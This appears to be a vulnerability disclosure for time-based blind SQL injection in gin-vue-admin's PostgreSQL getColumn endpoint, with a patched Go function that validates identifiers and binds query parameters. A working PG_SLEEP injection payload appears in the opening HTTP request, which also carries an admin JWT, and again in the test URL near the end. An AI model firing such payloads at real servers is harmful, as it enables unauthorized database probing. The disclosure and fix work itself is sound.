GET /autoCode/getColumn?tableName=123'%20AND%201178%3D(SELECT%201178%20FROM%20PG_SLEEP(5))%20AND%20'obSz'%3D'obSz HTTP/1.1
Host: 192.168.68.168:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
x-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNjJkMDNjZjgtZmIxOC00NGQ4LThhOWEtZDQwYjgyY2EyOTM4IiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Iui2hee6p-euoeeQhuWRmCIsIkF1dGhvcml0eUlkIjoiODg4IiwiQnVmZmVyVGltZSI6ODY0MDAsImV4cCI6MTY1MDM1MzM3OSwiaXNzIjoicW1QbHVzIiwibmJmIjoxNjQ5NzQ3NTc5fQ.SdRKIBiwwyq8Ye7O8lpvQpofnIShG9AvaEMDK29FaRM
// change this method
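// GetColumn returns every column of table tableName in database dbName
// (schema "public"): column name, data type, a length/precision summary and
// the column comment read from pg_description.
//
// Both arguments arrive from the HTTP layer and are untrusted. They are first
// checked to be plain identifiers and then handed to the query only as bound
// parameters; they are never spliced into the SQL text, so the query cannot be
// altered by their content.
//
// Returns an error when a name is not a plain identifier, when the connection
// cannot be opened, or when the query fails.
// Author [piexlmax](https://github.com/piexlmax)
// Author [SliverHorn](https://github.com/SliverHorn)
func (a *autoCodePgsql) GetColumn(tableName string, dbName string) (data []response.Column, err error) {
	// dbName is also used to build the connection DSN (LinkDsn, not shown
	// here), so reject anything that is not a bare identifier before it gets
	// that far; the same check keeps tableName well-formed.
	if !isPlainPgIdentifier(tableName) {
		return nil, errors.Errorf("[pgsql] invalid table name %q", tableName)
	}
	if !isPlainPgIdentifier(dbName) {
		return nil, errors.Errorf("[pgsql] invalid database name %q", dbName)
	}

	// todo: the data this query collects is incomplete; the SQL still needs work.
	//
	// All four values are bound positionally: gorm replaces each `?`, in
	// order, with a driver bind variable. The markers are deliberately NOT
	// wrapped in quotes — a quoted marker is a string literal ('?' / '$1'),
	// not a parameter, and never receives the value.
	const query = `
SELECT columns.COLUMN_NAME as column_name,
       columns.DATA_TYPE as data_type,
       CASE columns.DATA_TYPE
           WHEN 'text' THEN concat_ws('', '', columns.CHARACTER_MAXIMUM_LENGTH)
           WHEN 'varchar' THEN concat_ws('', '', columns.CHARACTER_MAXIMUM_LENGTH)
           WHEN 'smallint' THEN concat_ws(',', columns.NUMERIC_PRECISION, columns.NUMERIC_SCALE)
           WHEN 'decimal' THEN concat_ws(',', columns.NUMERIC_PRECISION, columns.NUMERIC_SCALE)
           WHEN 'integer' THEN concat_ws('', '', columns.NUMERIC_PRECISION)
           WHEN 'bigint' THEN concat_ws('', '', columns.NUMERIC_PRECISION)
           ELSE ''
       END AS data_type_long,
       (SELECT description.description
          FROM pg_description description
         WHERE description.objoid = (SELECT attribute.attrelid
                                       FROM pg_attribute attribute
                                      WHERE attribute.attrelid = (SELECT oid FROM pg_class class WHERE class.relname = ?)
                                        AND attname = columns.COLUMN_NAME)
           AND description.objsubid = (SELECT attribute.attnum
                                         FROM pg_attribute attribute
                                        WHERE attribute.attrelid = (SELECT oid FROM pg_class class WHERE class.relname = ?)
                                          AND attname = columns.COLUMN_NAME)) as column_comment
  FROM INFORMATION_SCHEMA.COLUMNS columns
 WHERE table_catalog = ?
   AND table_schema = 'public'
   AND table_name = ?
`

	db, openErr := gorm.Open(postgres.Open(global.GVA_CONFIG.Pgsql.LinkDsn(dbName)), &gorm.Config{Logger: logger.Default.LogMode(logger.Info)})
	if openErr != nil {
		// Wrap the open error itself. Wrapping the named result `err` (still
		// nil here) makes errors.Wrapf return nil and silently hides the failure.
		return nil, errors.Wrapf(openErr, "[pgsql] 连接 数据库(%s)的表(%s)失败!", dbName, tableName)
	}
	// gorm.Open creates a fresh connection pool on every call; release it so
	// repeated requests do not exhaust the server's connection slots.
	if sqlDB, dbErr := db.DB(); dbErr == nil {
		defer sqlDB.Close()
	}

	var entities []response.Column
	// Argument order follows the `?` markers: relname, relname, table_catalog, table_name.
	if err = db.Raw(query, tableName, tableName, dbName, tableName).Scan(&entities).Error; err != nil {
		return nil, err
	}
	return entities, nil
}

// isPlainPgIdentifier reports whether s looks like an unquoted PostgreSQL
// identifier: non-empty and made only of ASCII letters, digits, '_' and '$',
// or non-ASCII runes (PostgreSQL accepts letters from any script). Quotes,
// whitespace, ';', '=' and other punctuation are rejected; such characters
// have no place in a table or database name and must never reach the DSN.
func isPlainPgIdentifier(s string) bool {
	if s == "" {
		return false
	}
	for _, r := range s {
		switch {
		case r >= 'a' && r <= 'z',
			r >= 'A' && r <= 'Z',
			r >= '0' && r <= '9',
			r == '_', r == '$',
			r >= 0x80:
			// allowed
		default:
			return false
		}
	}
	return true
}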
condition:
The problem occurs in the following code in server/service/system/sys_auto_code_pgsql.go, which means that PostgreSQL must be used as the database for this vulnerability to occur. Simple test payload:
http://127.0.0.1:8888/autoCode/getColumn?tableName=123' AND 1178=(SELECT 1178 FROM PG_SLEEP(5)) AND 'obSz'='obSz
POC:
Patches:
https://github.com/flipped-aurora/gin-vue-admin/blob/main/server/service/system/sys_auto_code_pgsql.go